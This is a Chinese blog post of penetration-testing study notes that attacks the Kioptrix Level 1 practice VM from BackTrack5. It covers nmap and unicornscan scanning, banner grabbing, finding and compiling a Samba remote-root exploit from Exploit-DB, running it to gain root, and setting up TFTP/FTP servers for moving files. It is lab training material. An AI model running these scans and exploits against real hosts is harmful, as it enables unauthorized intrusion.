BackTrack5 学习笔记7 基于Kioptrix虚拟机的攻击实验1

最新推荐文章于 2024-07-28 23:19:17 发布
最新推荐文章于 2024-07-28 23:19:17 发布
阅读量1.8k 收藏
点赞数
分类专栏: # 网络安全 文章标签: virtualbox 虚拟机 技术 网络 nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xundh/article/details/77351716
版权

一、 Kioptrix虚拟机

http://www.kioptrix.com/
下载Kioptrix VM Level1

添加为VirtualBox的虚拟机
把Kioptrix虚拟机作为靶机。

二、 实验过程

1. 列举服务

使用nmap对网络中的机器进行扫描。

nmap -f -n -P0 -v -p- -T4 192.168.75.0/24

该命令使用分包技术对网段上所有的IP的TCP端口进行扫描。

* 使用Unicornscan进行快速扫描*

cp /usr/share/GeoIP/GeoIP.data /usr/local/etc/unicornscan/   #BackTrack5 R1 中需要运行此命令
apt-get install Unicornscan

unicornscan -mT -r500 -I 192.168.75.0/24   # 每秒500个数据包的速度扫描网段所有TCP端口。
unicornscan -mU -r500 -I 192.168.75.0/24   # 对UDP端口进行扫描

从上面命令返回结果,找到我们的目标靶机。

2. 完全扫描

利用Nmap进行完全扫描

nmap -n -sTUV -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14

获取目标主机开放端口,及目标上运行的服务。

3. 获取旗标

使用Netcat和Ncat获取旗标

nc 192.168,75.14 80
HEAD / HTTP 1.1
回车
回车

获取目标主机操作系统版本、web容器版本等。
使用Ncat获取旗标

ncat 192.168.75.14 80
HEAD / HTTP 1.1
回车
回车

使用smbclient获取旗标

smbclient - L 192.168.75.14 - N

利用smbclient工具可以通过139/TCP端口获得该服务的旗标。上面命令调用smbclient连接到目标主机,然后显示服务的信息。
- N 表示我们没有目标的root密码

扫描的结果如果有Samba版本,这个信息可以用来搜索针对这个服务有没有可能存在的漏洞。

4. 搜索Exploit-DB

在Exploit-DB.com上,可以找到已知漏洞的有用信息,以及验证其有效性的概念验证代码(POC)。通过使用概念验证代码,能确定目标软件版本是否存在漏洞。
搜索Samba版本2.2.1a的相关漏洞
1. 打开http://www.exploit-db.com
2. 单击search
3. 在Description 输入 Samba
4. Port 输入139
5. 单击Search

5. 离线的Exploit-DB

在BackTrack里包含了一份exploit-db.com数据库的拷贝。

cd /pentest/exploits/exploitdb
./searchsploit samba

这里写图片描述

我们尝试 Samba 2.2.8 Remote Root Exploit - sambal.c
POC 路径在 /linux/remote/10.c ,这是个C语言程序。首先需要编译。

cp /pentest/exploits/exploitdb/platforms/linux/remote/10.c /root/10.c
cd /root
vim 10.c
# 这时会看到源代码里很多^M,用vim命令删除它们
:%s/^M//g             # 这是在vim里输入的命令,其中^是ctrl+v 后面的M是ctrl+M
gcc 10.c -o SambaVuln10

如无意外,编译是成功不了的。脚本有很多语法错误需要处理。 处理到最后还可能有程序错误。
代码完成修改,并成功编译后,会生成SambaVuln。

6. 运行漏洞利用程序

./SambaVuln10
./SambaVuln10 -v -d 0 -S 192.168.75   # 程序的扫描模式
./SambaVuln10 -b 0 -v 192.168.75.14

这时将会获得目标机器的root权限。

cd /
ls  #这时看到目标主机的目录列表
whoami
hostname
lastlog

三、 在受害机器上传和下载文件

1. 在BT5 安装和启动TFTP服务

apt-get install atftpd
atftpd --daemon --port 69 --bind-address 192.168.75.12 /tmp
netstat - anu | grep 69

2. 安装和配置pure-ftpd

apt-get install pure-ftpd
echo /etc/pure-ftpd/pureftpd.pdb > PureDB
ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure
groupadd -g 7777 ftpz
useradd -u 7777 -s /bin/false -d /dev/null -c "pureFTP" -g ftpz Testerz
mkdir /var/ftp /var/ftp/public /var/ftp/public/ftplogin
chown -R testerz:ftpz /var/ftp/public/ftplogin
pure-pw useradd ftplogin -u Testerz -d /var/ftp/public/ftplogin
pure-pw mkdb
pure-pw show ftplogin
/etc/init.d/pure-ftpd start
ftp 127.0.0.1
编程圈子
关注
专栏目录
Vunlhub靶场 Kioptrix 1
m0_57221101的博客
02-18 237
勘探 nmap探查 port 备注 22 openSSH2.9 80 apache 1.3.20 111 rpcbind 139 smb 443 1024 80web 443同80 dirsearch进行一下目录爆破 python3.9 dirsearch.py -u 192.168.1.103 [20:16:17] 200 - 3KB - /index.html
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1652
Oscp备考
Kioptrix-1
qq_62066842的博客
03-29 393
vulnhub入门靶场Kioptrix系列练习
VulnHub靶机入门篇--Kioptrix4
最新发布
2302_78903258的博客
07-28 1101
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
kioptrix1(mod_ssl版本漏洞提权)
m0_66299232的博客
10-25 853
1.这里也可以从github中下载相关项目!按照步骤走即可提权。2.查找mod_ssl相关漏洞,进行编译,即可提权成功。攻击机系统:kali linux 2021.1。2.下载完 进入Openluck目录,进行编译。5.运行,成功提权,轻松拿下!探测目标靶机开放端口和服务情况。虚拟机网络链接模式:桥接模式。4.找到对应版本,填写参数。
Backtrack3.iso光盘映像(虚拟机使用)
11-06
backtrack3映像,可供vmware虚拟机使用;可U盘启动。 教程:U盘:使用bootinst等工具烧录进去,然后走BIOSU盘启动,注意选择U盘启动即可。 vmware:正常安装虚拟机步骤,注意网卡桥接,可在设置中更改
BackTrack渗透测试学习笔记
02-10
标题《BackTrack渗透测试学习笔记》指明了文档的主要内容,它是关于BackTrack操作系统在渗透测试领域的应用以及学习经验的集合。BackTrack是一个专门设计用于网络安全评估和渗透测试的Linux发行版。它包含了大量的...
Backtrack渗透测试学习笔记.rar
06-14
关于讲解 backtrack 的入侵与渗透的中文资料,文中从信息收集,身份识别,社会工程学攻击,metasploit 运用层攻击,局域网攻击,维持访问等几个方面对 Back|Track 做一个介绍
【Vulnhub通关】Kioptrix:Level 1 (#1)
icewolf00的博客
01-24 1232
注意:本文转载自本人稀土掘金博客。
Kioptrix Level 1 渗透方案
SecUpdate的专栏
06-22 3167
目标:Kioptrix Level 1[VMWare] 本机环境:BackTrack5 RC3[VMware](192.168.74.145) 网关:192.168.74.254 使用工具:nmap #1:查看 Kioptrix 在内网的IP地址。 工具:nmap 命令:nmap 192.168.74.0/24 –n –sP -sn 得到IP:192.168.74.1
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 538
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
网络安全之searchsploit的使用!
xnxqwzy的博客
12-26 1437
是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。)这是Offensive Security()赞助的一个项目。存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新,exploit-db提供searchsploit利用files.csv进行搜索离线漏洞库文件的位置。
Searchsploit
weixin_44110913的博客
07-27 1861
  Searchsploit   Searchsploit会通过本地的exploit-db, 查找软件漏洞信息   打开kali的命令行, 输入: searchsploit   查看系统帮助   查找mssql的漏洞   如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息: searchsploit mssql     要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开...
网络安全之searchsploit的使用
qq_44005305的博客
02-23 637
searchsploit是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。)这是Offensive Security()赞助的一个项目。存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新,exploit-db提供searchsploit利用files.csv进行搜索离线漏洞库文件的位置。
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1119
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

编程圈子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值